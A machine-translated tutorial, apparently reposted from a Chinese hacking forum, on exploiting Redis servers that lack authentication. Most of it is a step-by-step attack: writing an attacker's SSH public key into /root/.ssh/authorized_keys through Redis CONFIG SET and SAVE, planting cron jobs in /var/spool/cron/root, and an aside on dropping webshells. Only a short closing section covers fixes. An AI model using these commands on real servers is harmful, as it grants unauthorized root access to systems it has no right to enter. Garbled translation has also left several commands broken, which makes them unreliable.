Redis unauthorized password-free login with SSH and repair solutions

Redis unauthorized password-free login with SSH and repair solutions

 

Reading: 602

The author of this article will show you what Redis is, and learn about common Key operation commands and configuration commands of redis clients Redis-cli, Redis Desktop Manager, and Redis, this section describes how Redis is not authorized to use SSH for password-free login, and how to use Redis to write public keys and related repair solutions. This document consists

Original by ushen recommended by the red guest Alliance

Rdis unauthorized access HOST: CentOS 7 192.168.199.166
Hacker HOST: Kali 2016 192.168.199.199

1. What is Redis?

Redis is an open-source database written in ansi c and provides APIs in multiple languages. The so-called Key pair Value indicates that each KEY corresponds to a Value. Value can also be null. Like memcached, data is cached in the memory to ensure efficiency. The difference is that redis periodically writes the updated data to the disk or you can manually enter the save command and save it on the server. In addition, the master-slave (master-slave) synchronization is implemented.

Redis

2. Redis Client

Redis is installed by default. The default port is 6379.
By default, the Redis configuration is disabled, that is, external connections are not allowed. You need to manually modify/etc/redis. conf.
By default, Redis does not require any account or password for connection.
After Redis is installed, a server named "redis-server" is used to start the redis service by default. The command "redis-server/etc/redis. conf" is started"
After Redis is installed, a "redis-cli" client will be created by default to connect to the redis database. You can connect to redis on other hosts as well.

Detailed description of redis-cli client commands

Common redis-cli commands:

1 2 3 4 5 6 7-h: Specify the Host IP address or domain name-p: Specify the connection Port-a: Specify the password-r: Execute the specified command-n: database Name-x: output the last parameter as value

We connect to the redis of the target host CentOS on the hacker host Kali. If we execute the keys * command and do not return what requires authentication, it means that the target redis does not require password authentication.

Command

GUI client: Redis Desktop Manager

To Connect to Redis through a GUI, you can click Connect to Redis Server to create a connection to manage Redis data. If you need to execute a command, you can right-click "centos" and choose Console to perform the Redis command line interface. The command line interface is displayed in the bottom right corner.

Client

 

3. Common Redis commands

Key Operation Command

Set key value: Create a value corresponding to the key. If set test 123456, where test is key, 123456 is value

1

Get key: get key value:

2

Keys *: obtains all the keys. You can also search for the specified key as a wildcard.

3

4

Expire key 10: Set the key expiration time to 10 seconds. After 10 seconds, the key will be gone.

5

Del key: delete a key.

6

Server operation commands

Info: get basic information about redis and servers

7

Config get dir: get cat

8

Config set dir/root/: set the backup path of apsaradb for redis to/root/. If no permission is displayed, you do not have the permission to set this directory.

9

 

Config set dbfilename test. php: set the backup file name to test. php. The default value is dump. rdb.

Config get dbfilename: the name of the backup database.

10

Save: Back up the database content to the local disk. By default, the backup is in the src directory where Redis is installed. The name is dump. rdb.

4. Unauthorized use of Redis causes SSH password-free Login 1 2 3 meet the requirements of Redis to run with the root permission to meet the requirements on the server. ssh directory. I heard that it existed after I used SSH to log on, but I did not think so. ssh-keygen-t rsa generates a public/private key.

11

In ~ /. Run the following command in the ssh directory: 1 2 3 (echo-e "\ n"; cat id_rsa.pub; echo-e "\ n")> The key.txt command outputs the content of id_rsa.pubto key.txt, and adds two blank lines before and after to prevent errors.

12

Cat key.txt | redis-cli-h 192.168.199.166-x set crackit

 

This command is used to connect redis with the target 192.168.199.166 to set key.txt to the value of key "crackit" through the -xforward' command. In fact, the other database already has a key-value

13

Redis-cli-h 192.168.199.166 # connect to the redis of the target host
Config get dir # obtain the redis backup path
Config set dir/root/. ssh # set the backup path of the database
Config set dbfilename authorized_keys # set the name of the backup database to authorized_keys.
Config get dbfilename # Check whether the database name is correctly set
Key * # Check whether our key is successfully created
Save # save data to the hard disk

14

Password-free logon is successful.

15

Principle: in fact, the principle is to insert a piece of data in the database, take the local public key as the value, the name of the key is random, and then set the path of the backup database to/root /. ssh and the database backup name is authorized_keys. Then, an authorization KEY can be generated in the path of the target server.

Note: We recommend that you use this vulnerability to obtain webshells and obtain ssh. For example, save is used to back up all databases, this will cause a lot of messy data to be backed up to the authorization key, leading to connection failure. If it is in webshell, it will not be prone to parsing errors.

5. solve the problem that the redis public key cannot be logged on.

Some friends still cannot log on with a blank password when using the Redis public key. Why?
Solution

A. Generate authrized_keys from your public key using the above method, and then try to log on using the local form (local test mode) and ssh localhost mode. If you can log on normally, indicates that the authorization KEY is correct.

B. the permission to authorize the key on the infiltrated server should be 600
Use the Linux task plan to set the authorized authorized_keys permission to 600.
Echo-e "\ n */1 ***/bin/chmod 600 ~ /. Ssh/authorized_keys \ n "| redis-cli-h 127.0.0.1-x set 1
Redis-cli-h 127.0.0.1 config set dir/var/spool/cron/
Redis-cli-h 127.0.0.1 config set dbfilename root
Redis-cli-h 127.0.0.1 save

Explanation: the above section is actually a process for saving redis data, but it is to save the data as admin and store it under/var/spool/cron, the value of Key 1 indicates that the permission to modify authorized_keys of chmod 600 is set to 600 one minute after the task is scheduled.

C. The server does not have a. ssh directory.

Use the Linux task plan to create the folder
Echo-e "\ n */1 ***/bin/make ~ /. Ssh \ n "| redis-cli-h 127.0.0.1-x set 2
Redis-cli-h 127.0.0.1 config set dir/var/spool/cron/
Redis-cli-h 127.0.0.1 config set dbfilename root
Redis-cli-h 127.0.0.1 save

D. ssh Directory Permissions

How to set the permission for the. ssh directory using the Linux Task Plan
Echo-e "\ n */1 *****/bin/chmod 700/home/root /. ssh/\ n "| redis-cli-h 127.0.0.1-x set 1
Redis-cli-h 127.0.0.1 config set dir/var/spool/cron/
Redis-cli-h 127.0.0.1 config set dbfilename root
Redis-cli-h 127.0.0.1 save

6. Solutions

Disable Root from starting redis
Modify redis. config in the installation directory and set blin, to the specified IP address. You can log on to or locally log on to 127.0.0.1.
Set the password requirepass test123! @ # $